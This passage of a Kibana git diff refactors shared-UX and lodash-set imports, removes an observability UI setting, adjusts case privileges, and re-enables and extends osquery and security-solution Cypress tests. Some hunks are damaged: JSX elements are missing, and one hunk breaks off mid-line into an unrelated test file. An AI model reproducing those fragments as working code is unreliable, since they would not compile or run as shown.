import { createTypeFilter, createQuery } from './create_query'; describe('Create Type Filter', () => { diff --git a/x-pack/plugins/monitoring/server/telemetry_collection/get_all_stats.ts b/x-pack/plugins/monitoring/server/telemetry_collection/get_all_stats.ts index f1c36f848ca98..f74c712fb055a 100644 --- a/x-pack/plugins/monitoring/server/telemetry_collection/get_all_stats.ts +++ b/x-pack/plugins/monitoring/server/telemetry_collection/get_all_stats.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get, merge } from 'lodash'; import moment from 'moment'; diff --git a/x-pack/plugins/observability/common/index.ts b/x-pack/plugins/observability/common/index.ts index 794275c380c97..379404c3a48a1 100644 --- a/x-pack/plugins/observability/common/index.ts +++ b/x-pack/plugins/observability/common/index.ts @@ -15,7 +15,6 @@ export { enableInspectEsQueries, maxSuggestions, enableComparisonByDefault, - enableInfrastructureView, defaultApmServiceEnvironment, apmServiceInventoryOptimizedSorting, apmProgressiveLoading, diff --git a/x-pack/plugins/observability/common/ui_settings_keys.ts b/x-pack/plugins/observability/common/ui_settings_keys.ts index 60328a189b696..f3c77c76d4186 100644 --- a/x-pack/plugins/observability/common/ui_settings_keys.ts +++ b/x-pack/plugins/observability/common/ui_settings_keys.ts @@ -9,7 +9,6 @@ export const enableNewSyntheticsView = 'observability:enableNewSyntheticsView'; export const enableInspectEsQueries = 'observability:enableInspectEsQueries'; export const maxSuggestions = 'observability:maxSuggestions'; export const enableComparisonByDefault = 'observability:enableComparisonByDefault'; -export const enableInfrastructureView = 'observability:enableInfrastructureView'; export const defaultApmServiceEnvironment = 'observability:apmDefaultServiceEnvironment'; export const apmProgressiveLoading = 'observability:apmProgressiveLoading'; export const enableServiceGroups = 'observability:enableServiceGroups'; diff --git a/x-pack/plugins/observability/kibana.json b/x-pack/plugins/observability/kibana.json index 5464bffccd9cd..7754aedfe9ffc 100644 --- a/x-pack/plugins/observability/kibana.json +++ b/x-pack/plugins/observability/kibana.json @@ -31,7 +31,6 @@ "triggersActionsUi", "inspector", "unifiedSearch", - "sharedUX", "security" ], "ui": true, diff --git a/x-pack/plugins/observability/public/application/application.test.tsx b/x-pack/plugins/observability/public/application/application.test.tsx index 371be0ceb3a34..d630988446aa6 100644 --- a/x-pack/plugins/observability/public/application/application.test.tsx +++ b/x-pack/plugins/observability/public/application/application.test.tsx @@ -11,7 +11,7 @@ import React from 'react'; import { Observable } from 'rxjs'; import { AppMountParameters, CoreStart } from '@kbn/core/public'; import { themeServiceMock } from '@kbn/core/public/mocks'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { ObservabilityPublicPluginsStart } from '../plugin'; import { createObservabilityRuleTypeRegistryMock } from '../rules/observability_rule_type_registry_mock'; import { renderApp } from '.'; diff --git a/x-pack/plugins/observability/public/components/app/section/apm/index.test.tsx b/x-pack/plugins/observability/public/components/app/section/apm/index.test.tsx index 6ba0556fa0172..00b4e464e1f45 100644 --- a/x-pack/plugins/observability/public/components/app/section/apm/index.test.tsx +++ b/x-pack/plugins/observability/public/components/app/section/apm/index.test.tsx @@ -17,7 +17,7 @@ import * as pluginContext from '../../../../hooks/use_plugin_context'; import { HasDataContextValue } from '../../../../context/has_data_context'; import { AppMountParameters } from '@kbn/core/public'; import { createObservabilityRuleTypeRegistryMock } from '../../../../rules/observability_rule_type_registry_mock'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; jest.mock('react-router-dom', () => ({ useLocation: () => ({ diff --git a/x-pack/plugins/observability/public/components/shared/page_template/page_template.test.tsx b/x-pack/plugins/observability/public/components/shared/page_template/page_template.test.tsx index 176e137242ebc..89574732b5a85 100644 --- a/x-pack/plugins/observability/public/components/shared/page_template/page_template.test.tsx +++ b/x-pack/plugins/observability/public/components/shared/page_template/page_template.test.tsx @@ -10,7 +10,8 @@ import { render } from '@testing-library/react'; import { shallow } from 'enzyme'; import React from 'react'; import { of } from 'rxjs'; -import { sharedUXPluginMock } from '@kbn/shared-ux-plugin/public/mocks'; +import { getKibanaPageTemplateKibanaDependenciesMock as getPageTemplateServices } from '@kbn/shared-ux-page-kibana-template-mocks'; + import { createNavigationRegistry } from '../../../services/navigation_registry'; import { createLazyObservabilityPageTemplate } from './lazy_page_template'; import { ObservabilityPageTemplate } from './page_template'; @@ -52,7 +53,7 @@ describe('Page template', () => { getUrlForApp: () => '/test-url', navigateToApp: async () => {}, navigationSections$: navigationRegistry.sections$, - getSharedUXContext: sharedUXPluginMock.createStartContract().getContextServices, + getPageTemplateServices, }); const component = shallow( @@ -76,11 +77,11 @@ describe('Page template', () => { getUrlForApp={() => '/test-url'} navigateToApp={async () => {}} navigationSections$={navigationRegistry.sections$} - getSharedUXContext={sharedUXPluginMock.createStartContract().getContextServices} pageHeader={{ pageTitle: 'Test title', rightSideItems: [Test side item], }} + getPageTemplateServices={getPageTemplateServices} >
Test structure
@@ -97,11 +98,11 @@ describe('Page template', () => { getUrlForApp={() => '/test-url'} navigateToApp={async () => {}} navigationSections$={navigationRegistry.sections$} - getSharedUXContext={sharedUXPluginMock.createStartContract().getContextServices} pageHeader={{ pageTitle: 'Test title', rightSideItems: [Test side item], }} + getPageTemplateServices={getPageTemplateServices} >
Test structure
diff --git a/x-pack/plugins/observability/public/components/shared/page_template/page_template.tsx b/x-pack/plugins/observability/public/components/shared/page_template/page_template.tsx index ee05d2c4b59cb..d852a8658c2e1 100644 --- a/x-pack/plugins/observability/public/components/shared/page_template/page_template.tsx +++ b/x-pack/plugins/observability/public/components/shared/page_template/page_template.tsx @@ -12,10 +12,15 @@ import { matchPath, useLocation } from 'react-router-dom'; import useObservable from 'react-use/lib/useObservable'; import type { Observable } from 'rxjs'; import type { ApplicationStart } from '@kbn/core/public'; -import { SharedUxServicesProvider } from '@kbn/shared-ux-services'; -import type { SharedUXPluginStart } from '@kbn/shared-ux-plugin/public'; import { useKibana } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplate, KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import { + KibanaPageTemplate, + KibanaPageTemplateKibanaProvider, +} from '@kbn/shared-ux-page-kibana-template'; +import type { + KibanaPageTemplateProps, + KibanaPageTemplateKibanaDependencies, +} from '@kbn/shared-ux-page-kibana-template'; import type { NavigationSection } from '../../../services/navigation_registry'; import { ObservabilityTour } from '../tour'; import { NavNameWithBadge, hideBadge } from './nav_name_with_badge'; @@ -43,7 +48,7 @@ export interface ObservabilityPageTemplateDependencies { getUrlForApp: ApplicationStart['getUrlForApp']; navigateToApp: ApplicationStart['navigateToApp']; navigationSections$: Observable; - getSharedUXContext: SharedUXPluginStart['getContextServices']; + getPageTemplateServices: () => KibanaPageTemplateKibanaDependencies; } export type ObservabilityPageTemplateProps = ObservabilityPageTemplateDependencies & @@ -55,15 +60,14 @@ export function ObservabilityPageTemplate({ getUrlForApp, navigateToApp, navigationSections$, - getSharedUXContext, showSolutionNav = true, isPageDataLoaded = true, + getPageTemplateServices, ...pageTemplateProps }: ObservabilityPageTemplateProps): React.ReactElement | null { const sections = useObservable(navigationSections$, []); const currentAppId = useObservable(currentAppId$, undefined); const { pathname: currentPath } = useLocation(); - const sharedUXServices = getSharedUXContext(); const { services } = useKibana(); @@ -130,7 +134,7 @@ export function ObservabilityPageTemplate({ ); return ( - + - + ); } diff --git a/x-pack/plugins/observability/public/index.ts b/x-pack/plugins/observability/public/index.ts index 04cb8289dd247..b4e23ce0e83ad 100644 --- a/x-pack/plugins/observability/public/index.ts +++ b/x-pack/plugins/observability/public/index.ts @@ -27,7 +27,6 @@ export type { export { enableInspectEsQueries, enableComparisonByDefault, - enableInfrastructureView, enableServiceGroups, enableNewSyntheticsView, apmServiceGroupMaxNumberOfServices, diff --git a/x-pack/plugins/observability/public/pages/cases/cases.stories.tsx b/x-pack/plugins/observability/public/pages/cases/cases.stories.tsx index b384047a1c77b..bab4397a49a75 100644 --- a/x-pack/plugins/observability/public/pages/cases/cases.stories.tsx +++ b/x-pack/plugins/observability/public/pages/cases/cases.stories.tsx @@ -9,7 +9,7 @@ import React, { ComponentType } from 'react'; import { MemoryRouter } from 'react-router-dom'; import { AppMountParameters } from '@kbn/core/public'; import { CoreStart } from '@kbn/core/public'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { createKibanaReactContext } from '@kbn/kibana-react-plugin/public'; import { casesFeatureId } from '../../../common'; import { PluginContext, PluginContextValue } from '../../context/plugin_context'; diff --git a/x-pack/plugins/observability/public/pages/overview/overview.stories.tsx b/x-pack/plugins/observability/public/pages/overview/overview.stories.tsx index aab1663482636..2e384e83fd03d 100644 --- a/x-pack/plugins/observability/public/pages/overview/overview.stories.tsx +++ b/x-pack/plugins/observability/public/pages/overview/overview.stories.tsx @@ -12,7 +12,7 @@ import React, { ReactNode } from 'react'; import { MemoryRouter } from 'react-router-dom'; import { UI_SETTINGS } from '@kbn/data-plugin/public'; import { createKibanaReactContext } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { HasDataContextProvider } from '../../context/has_data_context'; import { PluginContext } from '../../context/plugin_context'; import { registerDataHandler, unregisterDataHandler } from '../../data_handler'; diff --git a/x-pack/plugins/observability/public/pages/rules/index.test.tsx b/x-pack/plugins/observability/public/pages/rules/index.test.tsx index a9bf4aff99a83..cc8a093e32333 100644 --- a/x-pack/plugins/observability/public/pages/rules/index.test.tsx +++ b/x-pack/plugins/observability/public/pages/rules/index.test.tsx @@ -14,7 +14,7 @@ import { ObservabilityPublicPluginsStart } from '../../plugin'; import { RulesPage } from '.'; import { kibanaStartMock } from '../../utils/kibana_react.mock'; import * as pluginContext from '../../hooks/use_plugin_context'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { createObservabilityRuleTypeRegistryMock } from '../../rules/observability_rule_type_registry_mock'; import { AppMountParameters } from '@kbn/core/public'; import { ALERTS_FEATURE_ID } from '@kbn/alerting-plugin/common'; diff --git a/x-pack/plugins/observability/public/plugin.ts b/x-pack/plugins/observability/public/plugin.ts index 617dce2959f1e..97b3746671c9d 100644 --- a/x-pack/plugins/observability/public/plugin.ts +++ b/x-pack/plugins/observability/public/plugin.ts @@ -26,7 +26,6 @@ import type { EmbeddableStart } from '@kbn/embeddable-plugin/public'; import type { HomePublicPluginSetup, HomePublicPluginStart } from '@kbn/home-plugin/public'; import { CasesDeepLinkId, CasesUiStart, getCasesDeepLinks } from '@kbn/cases-plugin/public'; import type { LensPublicStart } from '@kbn/lens-plugin/public'; -import type { SharedUXPluginStart } from '@kbn/shared-ux-plugin/public'; import { TriggersAndActionsUIPublicPluginSetup, TriggersAndActionsUIPublicPluginStart, @@ -72,7 +71,6 @@ export interface ObservabilityPublicPluginsStart { dataViews: DataViewsPublicPluginStart; lens: LensPublicStart; discover: DiscoverStart; - sharedUX: SharedUXPluginStart; ruleTypeRegistry: RuleTypeRegistryContract; actionTypeRegistry: ActionTypeRegistryContract; security: SecurityPluginStart; @@ -282,7 +280,7 @@ export class Plugin getUrlForApp: application.getUrlForApp, navigateToApp: application.navigateToApp, navigationSections$: this.navigationRegistry.sections$, - getSharedUXContext: pluginsStart.sharedUX.getContextServices, + getPageTemplateServices: () => ({ coreStart }), }); const getAsyncO11yAlertsTableConfiguration = async () => { diff --git a/x-pack/plugins/observability/public/utils/no_data_config.ts b/x-pack/plugins/observability/public/utils/no_data_config.ts index c71520e35bf18..be19e6658b5b6 100644 --- a/x-pack/plugins/observability/public/utils/no_data_config.ts +++ b/x-pack/plugins/observability/public/utils/no_data_config.ts @@ -7,7 +7,7 @@ import { i18n } from '@kbn/i18n'; import { IBasePath } from '@kbn/core/public'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { NoDataConfig } from '@kbn/shared-ux-page-kibana-template'; export function getNoDataConfig({ docsLink, @@ -17,7 +17,7 @@ export function getNoDataConfig({ docsLink: string; basePath: IBasePath; hasData?: boolean; -}): KibanaPageTemplateProps['noDataConfig'] { +}): NoDataConfig | undefined { if (hasData === false) { return { solution: i18n.translate('xpack.observability.noDataConfig.solutionName', { diff --git a/x-pack/plugins/observability/public/utils/test_helper.tsx b/x-pack/plugins/observability/public/utils/test_helper.tsx index d262f290d1fe1..ef197f7dfc8d5 100644 --- a/x-pack/plugins/observability/public/utils/test_helper.tsx +++ b/x-pack/plugins/observability/public/utils/test_helper.tsx @@ -12,7 +12,7 @@ import { coreMock } from '@kbn/core/public/mocks'; import React from 'react'; import { __IntlProvider as IntlProvider } from '@kbn/i18n-react'; import { KibanaContextProvider } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import translations from '@kbn/translations-plugin/translations/ja-JP.json'; import { EuiThemeProvider } from '@kbn/kibana-react-plugin/common'; import { dataPluginMock } from '@kbn/data-plugin/public/mocks'; diff --git a/x-pack/plugins/observability/server/plugin.ts b/x-pack/plugins/observability/server/plugin.ts index de4345998d4fe..c05a51741dde7 100644 --- a/x-pack/plugins/observability/server/plugin.ts +++ b/x-pack/plugins/observability/server/plugin.ts @@ -55,7 +55,7 @@ export class ObservabilityPlugin implements Plugin { cases: [observabilityFeatureId], privileges: { all: { - api: ['casesSuggestUserProfiles'], + api: ['casesSuggestUserProfiles', 'bulkGetUserProfiles'], app: [casesFeatureId, 'kibana'], catalogue: [observabilityFeatureId], cases: { @@ -71,6 +71,7 @@ export class ObservabilityPlugin implements Plugin { ui: casesCapabilities.all, }, read: { + api: ['bulkGetUserProfiles'], app: [casesFeatureId, 'kibana'], catalogue: [observabilityFeatureId], cases: { diff --git a/x-pack/plugins/observability/server/ui_settings.ts b/x-pack/plugins/observability/server/ui_settings.ts index 36fb6cd9f62ff..f22da4b96e6b9 100644 --- a/x-pack/plugins/observability/server/ui_settings.ts +++ b/x-pack/plugins/observability/server/ui_settings.ts @@ -13,7 +13,6 @@ import { enableComparisonByDefault, enableInspectEsQueries, maxSuggestions, - enableInfrastructureView, defaultApmServiceEnvironment, apmProgressiveLoading, enableServiceGroups, @@ -84,17 +83,6 @@ export const uiSettings: Record { cy.contains('osquery_manager-'); }); - it.skip('should have integration and packs copied when upgrading integration', () => { + it('should have integration and packs copied when upgrading integration', () => { const packageName = 'osquery_manager'; const oldVersion = '1.2.0'; - const newVersion = '1.3.1'; cy.visit(`app/integrations/detail/${packageName}-${oldVersion}/overview`); cy.contains('Add Osquery Manager').click(); @@ -100,7 +100,10 @@ describe('ALL - Add Integration', () => { navigateTo('app/osquery/packs'); findAndClickButton('Add pack'); findFormFieldByRowsLabelAndType('Name', 'Integration'); - findFormFieldByRowsLabelAndType('Scheduled agent policies (optional)', '{downArrow} {enter}'); + findFormFieldByRowsLabelAndType( + 'Scheduled agent policies (optional)', + 'Agent policy 1 {downArrow} {enter}' + ); findAndClickButton('Add query'); cy.react('EuiComboBox', { props: { placeholder: 'Search for a query to run, or write a new query below' }, @@ -109,6 +112,7 @@ describe('ALL - Add Integration', () => { .type('{downArrow} {enter}'); cy.contains(/^Save$/).click(); cy.contains(/^Save pack$/).click(); + cy.contains(/^Successfully created "Integration" pack$/).click(); cy.visit('app/fleet/policies'); cy.contains('Agent policy 1').click(); cy.contains('Upgrade').click(); @@ -119,14 +123,15 @@ describe('ALL - Add Integration', () => { cy.contains(/^Advanced$/).click(); cy.contains('"Integration":'); cy.contains('Cancel').click(); + closeModalIfVisible(); cy.get('tr') .should('contain', 'osquery_manager-2') .and('contain', 'Osquery Manager') - .and('contain', `v${newVersion}`); + .and('contain', 'v') + .and('not.contain', `v${oldVersion}`); cy.contains('Actions').click(); cy.contains('View policy').click(); cy.contains('name: osquery_manager-2'); - cy.contains(`version: ${newVersion}`); // test list of prebuilt queries navigateTo('/app/osquery/saved_queries'); diff --git a/x-pack/plugins/osquery/cypress/integration/all/alerts.spec.ts b/x-pack/plugins/osquery/cypress/integration/all/alerts.spec.ts index 80516f480e803..ee4992b04b1d2 100644 --- a/x-pack/plugins/osquery/cypress/integration/all/alerts.spec.ts +++ b/x-pack/plugins/osquery/cypress/integration/all/alerts.spec.ts @@ -49,7 +49,7 @@ describe('Alert Event Details', () => { closeModalIfVisible(); cy.contains(PACK_NAME); cy.visit('/app/security/rules'); - cy.contains(RULE_NAME).click(); + cy.contains(RULE_NAME); cy.wait(2000); cy.getBySel('ruleSwitch').should('have.attr', 'aria-checked', 'true'); cy.getBySel('ruleSwitch').click(); @@ -58,13 +58,23 @@ describe('Alert Event Details', () => { cy.getBySel('ruleSwitch').should('have.attr', 'aria-checked', 'true'); }); - it.skip('should be able to run live query and add to timeline (-depending on the previous test)', () => { + it('should be able to run live query and add to timeline (-depending on the previous test)', () => { const TIMELINE_NAME = 'Untitled timeline'; cy.visit('/app/security/alerts'); cy.getBySel('header-page-title').contains('Alerts').should('exist'); - cy.getBySel('timeline-context-menu-button').first().click(); - cy.getBySel('osquery-action-item').should('exist').contains('Run Osquery'); - cy.getBySel('expand-event').first().click(); + cy.getBySel('expand-event') + .first() + .within(() => { + cy.get(`[data-is-loading="true"]`).should('exist'); + }); + cy.getBySel('expand-event') + .first() + .within(() => { + cy.get(`[data-is-loading="true"]`).should('not.exist'); + }); + cy.getBySel('timeline-context-menu-button').first().click({ force: true }); + cy.contains('Run Osquery'); + cy.getBySel('expand-event').first().click({ force: true }); cy.getBySel('take-action-dropdown-btn').click(); cy.getBySel('osquery-action-item').click(); cy.contains('1 agent selected.'); diff --git a/x-pack/plugins/osquery/cypress/integration/all/live_query.spec.ts b/x-pack/plugins/osquery/cypress/integration/all/live_query.spec.ts index 731802a021ae4..0678f3170f234 100644 --- a/x-pack/plugins/osquery/cypress/integration/all/live_query.spec.ts +++ b/x-pack/plugins/osquery/cypress/integration/all/live_query.spec.ts @@ -28,6 +28,7 @@ import { ROLES } from '../../test'; describe('ALL - Live Query', () => { before(() => { runKbnArchiverScript(ArchiverMethod.LOAD, 'ecs_mapping_1'); + runKbnArchiverScript(ArchiverMethod.LOAD, 'example_pack'); }); beforeEach(() => { @@ -37,6 +38,7 @@ describe('ALL - Live Query', () => { after(() => { runKbnArchiverScript(ArchiverMethod.UNLOAD, 'ecs_mapping_1'); + runKbnArchiverScript(ArchiverMethod.UNLOAD, 'example_pack'); }); it('should run query and enable ecs mapping', () => { @@ -94,22 +96,27 @@ describe('ALL - Live Query', () => { cy.react('ReactAce', { props: { value: 'select * from users' } }).should('exist'); }); - it.skip('should run live pack', () => { + it('should run live pack', () => { cy.contains('New live query').click(); cy.contains('Run a set of queries in a pack.').click(); cy.get(LIVE_QUERY_EDITOR).should('not.exist'); cy.getBySel('select-live-pack').click(); - cy.contains('Integration').click(); - cy.contains('This table contains 1 rows.'); - cy.contains('Integration ('); + cy.contains('Example').click(); + cy.contains('This table contains 3 rows.'); cy.contains('system_memory_linux_elastic'); + cy.contains('system_info_elastic'); + cy.contains('failingQuery'); selectAllAgents(); submitQuery(); cy.getBySel('live-query-loading').should('exist'); cy.getBySel('live-query-loading', { timeout: 10000 }).should('not.exist'); - cy.getBySel('toggleIcon-events').click(); + cy.getBySel('toggleIcon-system_memory_linux_elastic').click(); checkResults(); + cy.getBySel('toggleIcon-system_memory_linux_elastic').click(); + cy.getBySel('toggleIcon-failingQuery').click(); + cy.contains('Status').click(); + cy.contains('query failed, code: 1, message: no such table: opera_extensions'); navigateTo('/app/osquery'); - cy.contains('Integration'); + cy.contains('Example'); }); }); diff --git a/x-pack/plugins/osquery/cypress/integration/all/packs.spec.ts b/x-pack/plugins/osquery/cypress/integration/all/packs.spec.ts index 71a3cf11097c4..72fae5479a85e 100644 --- a/x-pack/plugins/osquery/cypress/integration/all/packs.spec.ts +++ b/x-pack/plugins/osquery/cypress/integration/all/packs.spec.ts @@ -59,7 +59,7 @@ describe('ALL - Packs', () => { cy.react('EuiFormRow', { props: { label: 'Interval (s)' } }) .click() .clear() - .type('10'); + .type('5'); cy.react('EuiFlyoutFooter').react('EuiButton').contains('Save').click(); cy.react('EuiTableRow').contains(SAVED_QUERY_ID); findAndClickButton('Save pack'); @@ -85,6 +85,7 @@ describe('ALL - Packs', () => { findAndClickButton('Update pack'); cy.contains('Save and deploy changes'); findAndClickButton('Save and deploy changes'); + cy.contains(`Successfully updated "${PACK_NAME}" pack`); }); it('should trigger validation when saved query is being chosen', () => { @@ -97,6 +98,7 @@ describe('ALL - Packs', () => { cy.contains('ID must be unique').should('exist'); cy.react('EuiFlyoutFooter').react('EuiButtonEmpty').contains('Cancel').click(); }); + it.skip('should open lens in new tab', () => { let lensUrl = ''; cy.window().then((win) => { @@ -161,6 +163,28 @@ describe('ALL - Packs', () => { cy.contains(`Successfully activated "${PACK_NAME}" pack`).should('exist'); }); + it.skip('should verify that packs are triggered', () => { + cy.waitForReact(); + preparePack(PACK_NAME); + cy.contains(`${PACK_NAME} details`).should('exist'); + + cy.getBySel('docsLoading').should('exist'); + cy.getBySel('docsLoading').should('not.exist'); + cy.react('ScheduledQueryLastResults') + .should('exist') + .within(() => { + cy.react('FormattedRelative'); + }); + + cy.react('DocsColumnResults').within(() => { + cy.react('EuiNotificationBadge').contains('1'); + }); + cy.react('AgentsColumnResults').within(() => { + cy.react('EuiNotificationBadge').contains('1'); + }); + cy.getBySel('packResultsErrorsEmpty').should('have.length', 2); + }); + it('delete all queries in the pack', () => { preparePack(PACK_NAME); cy.contains(/^Edit$/).click(); @@ -260,6 +284,7 @@ describe('ALL - Packs', () => { .click(); cy.contains(/^Delete integration$/).click(); closeModalIfVisible(); + cy.contains(/^Deleted integration 'osquery_manager-3'$/); navigateTo('app/osquery/packs'); cy.contains(REMOVING_PACK).click(); cy.contains(`${REMOVING_PACK} details`).should('exist'); diff --git a/x-pack/plugins/osquery/cypress/integration/roles/alert_test.spec.ts b/x-pack/plugins/osquery/cypress/integration/roles/alert_test.spec.ts index b68cd0d17e466..5d25b6599b13c 100644 --- a/x-pack/plugins/osquery/cypress/integration/roles/alert_test.spec.ts +++ b/x-pack/plugins/osquery/cypress/integration/roles/alert_test.spec.ts @@ -13,7 +13,7 @@ import { preparePack } from '../../tasks/packs'; import { closeModalIfVisible } from '../../tasks/integrations'; import { navigateTo } from '../../tasks/navigation'; -describe.skip('Alert_Test', () => { +describe('Alert_Test', () => { before(() => { runKbnArchiverScript(ArchiverMethod.LOAD, 'pack'); runKbnArchiverScript(ArchiverMethod.LOAD, 'rule'); diff --git a/x-pack/plugins/osquery/cypress/integration/roles/t1_analyst.spec.ts b/x-pack/plugins/osquery/cypress/integration/roles/t1_analyst.spec.ts index 57995296cfb17..c151cce2c2e60 100644 --- a/x-pack/plugins/osquery/cypress/integration/roles/t1_analyst.spec.ts +++ b/x-pack/plugins/osquery/cypress/integration/roles/t1_analyst.spec.ts @@ -12,7 +12,7 @@ import { checkResults, selectAllAgents, submitQuery } from '../../tasks/live_que import { ArchiverMethod, runKbnArchiverScript } from '../../tasks/archiver'; import { getSavedQueriesDropdown, LIVE_QUERY_EDITOR } from '../../screens/live_query'; -describe.skip('T1 Analyst - READ + runSavedQueries ', () => { +describe('T1 Analyst - READ + runSavedQueries ', () => { const SAVED_QUERY_ID = 'Saved-Query-Id'; beforeEach(() => { diff --git a/x-pack/plugins/osquery/cypress/integration/roles/t2_analyst.spec.ts b/x-pack/plugins/osquery/cypress/integration/roles/t2_analyst.spec.ts index cf91a49e9dad6..901b18f1461c7 100644 --- a/x-pack/plugins/osquery/cypress/integration/roles/t2_analyst.spec.ts +++ b/x-pack/plugins/osquery/cypress/integration/roles/t2_analyst.spec.ts @@ -19,7 +19,7 @@ import { import { ArchiverMethod, runKbnArchiverScript } from '../../tasks/archiver'; import { getSavedQueriesComplexTest } from '../../tasks/saved_queries'; -describe.skip('T2 Analyst - READ + Write Live/Saved + runSavedQueries ', () => { +describe('T2 Analyst - READ + Write Live/Saved + runSavedQueries ', () => { const SAVED_QUERY_ID = 'Saved-Query-Id'; const NEW_SAVED_QUERY_ID = 'Saved-Query-Id-T2'; const NEW_SAVED_QUERY_DESCRIPTION = 'Test saved query description T2'; diff --git a/x-pack/plugins/osquery/public/packs/pack_queries_status_table.tsx b/x-pack/plugins/osquery/public/packs/pack_queries_status_table.tsx index c698db405add4..a0a1873836721 100644 --- a/x-pack/plugins/osquery/public/packs/pack_queries_status_table.tsx +++ b/x-pack/plugins/osquery/public/packs/pack_queries_status_table.tsx @@ -492,7 +492,7 @@ const AgentsColumnResults: React.FC = ({ actionI interval, }); if (isLoading) { - return ; + return ; } if (!lastResultsData) { @@ -531,7 +531,7 @@ const ErrorsColumnResults: React.FC = ({ } if (!errorsData?.total) { - return <>{'-'}; + return {'-'}; } return ( diff --git a/x-pack/plugins/rule_registry/common/mapping_from_field_map.ts b/x-pack/plugins/rule_registry/common/mapping_from_field_map.ts index 4833631f09adb..1b66496bee19b 100644 --- a/x-pack/plugins/rule_registry/common/mapping_from_field_map.ts +++ b/x-pack/plugins/rule_registry/common/mapping_from_field_map.ts @@ -6,7 +6,7 @@ */ import type * as estypes from '@elastic/elasticsearch/lib/api/typesWithBodyKey'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { FieldMap } from './field_map/types'; export function mappingFromFieldMap( diff --git a/x-pack/plugins/rule_registry/server/utils/create_lifecycle_rule_type.test.ts b/x-pack/plugins/rule_registry/server/utils/create_lifecycle_rule_type.test.ts index fefffd204c4a3..e602c0228f886 100644 --- a/x-pack/plugins/rule_registry/server/utils/create_lifecycle_rule_type.test.ts +++ b/x-pack/plugins/rule_registry/server/utils/create_lifecycle_rule_type.test.ts @@ -73,6 +73,7 @@ function createRule(shouldWriteAlerts: boolean = true) { scheduleActions, } as any; }, + hasReachedAlertLimit: () => false, done: () => ({ getRecoveredAlerts: () => [] }), }; diff --git a/x-pack/plugins/security_solution/common/constants.ts b/x-pack/plugins/security_solution/common/constants.ts index 4c31f0d895464..65d1d54dcf3bc 100644 --- a/x-pack/plugins/security_solution/common/constants.ts +++ b/x-pack/plugins/security_solution/common/constants.ts @@ -427,11 +427,17 @@ export const RULES_TABLE_MAX_PAGE_SIZE = 100; export const RULES_TABLE_PAGE_SIZE_OPTIONS = [5, 10, 20, 50, RULES_TABLE_MAX_PAGE_SIZE]; /** - * A local storage key we use to store the state of the feature tour UI for the Rule Management page. + * Local storage keys we use to store the state of our new features tours we currently show in the app. * - * NOTE: As soon as we want to show a new tour for features in the current Kibana version, - * we will need to update this constant with the corresponding version. + * NOTE: As soon as we want to show tours for new features in the upcoming release, + * we will need to update these constants with the corresponding version. */ +export const NEW_FEATURES_TOUR_STORAGE_KEYS = { + RULE_MANAGEMENT_PAGE: 'securitySolution.rulesManagementPage.newFeaturesTour.v8.4', + RULE_CREATION_PAGE_DEFINE_STEP: + 'securitySolution.ruleCreationPage.defineStep.newFeaturesTour.v8.4', +}; + export const RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY = 'securitySolution.rulesManagementPage.newFeaturesTour.v8.4'; diff --git a/x-pack/plugins/security_solution/cypress/integration/detection_rules/export_rule.spec.ts b/x-pack/plugins/security_solution/cypress/integration/detection_rules/export_rule.spec.ts index f844a2960deb3..4451048ee0816 100644 --- a/x-pack/plugins/security_solution/cypress/integration/detection_rules/export_rule.spec.ts +++ b/x-pack/plugins/security_solution/cypress/integration/detection_rules/export_rule.spec.ts @@ -21,12 +21,16 @@ import { bulkExportRules, selectAllRules, } from '../../tasks/alerts_detection_rules'; +import { createExceptionList, deleteExceptionList } from '../../tasks/api_calls/exceptions'; +import { getExceptionList } from '../../objects/exception'; import { createCustomRule } from '../../tasks/api_calls/rules'; import { cleanKibana, deleteAlertsAndRules } from '../../tasks/common'; import { login, visitWithoutDateRange } from '../../tasks/login'; import { DETECTIONS_RULE_MANAGEMENT_URL } from '../../urls/navigation'; +const exceptionList = getExceptionList(); + describe('Export rules', () => { before(() => { cleanKibana(); @@ -86,4 +90,48 @@ describe('Export rules', () => { `Successfully exported ${expectedNumberCustomRulesToBeExported} of ${totalNumberOfRules} rules. Prebuilt rules were excluded from the resulting file.` ); }); + + context('rules with exceptions', () => { + beforeEach(() => { + deleteExceptionList(exceptionList.list_id, exceptionList.namespace_type); + // create rule with exceptions + createExceptionList(exceptionList, exceptionList.list_id).then((response) => + createCustomRule( + { + ...getNewRule(), + name: 'rule with exceptions', + exceptionLists: [ + { + id: response.body.id, + list_id: exceptionList.list_id, + type: exceptionList.type, + namespace_type: exceptionList.namespace_type, + }, + ], + }, + '2' + ) + ); + }); + + it('exports custom rules with exceptions', function () { + // one rule with exception, one without it + const expectedNumberCustomRulesToBeExported = 2; + + loadPrebuiltDetectionRulesFromHeaderBtn(); + + selectAllRules(); + bulkExportRules(); + + // should display correct number of custom rules when one of them has exceptions + cy.get(MODAL_CONFIRMATION_BTN) + .should('have.text', `Export ${expectedNumberCustomRulesToBeExported} custom rules`) + .click(); + + cy.get(TOASTER_BODY).should( + 'contain', + `Successfully exported ${expectedNumberCustomRulesToBeExported}` + ); + }); + }); }); diff --git a/x-pack/plugins/security_solution/cypress/integration/exceptions/add_edit_data_view_exception.spec.ts b/x-pack/plugins/security_solution/cypress/integration/exceptions/add_edit_data_view_exception.spec.ts new file mode 100644 index 0000000000000..c818f4e51060f --- /dev/null +++ 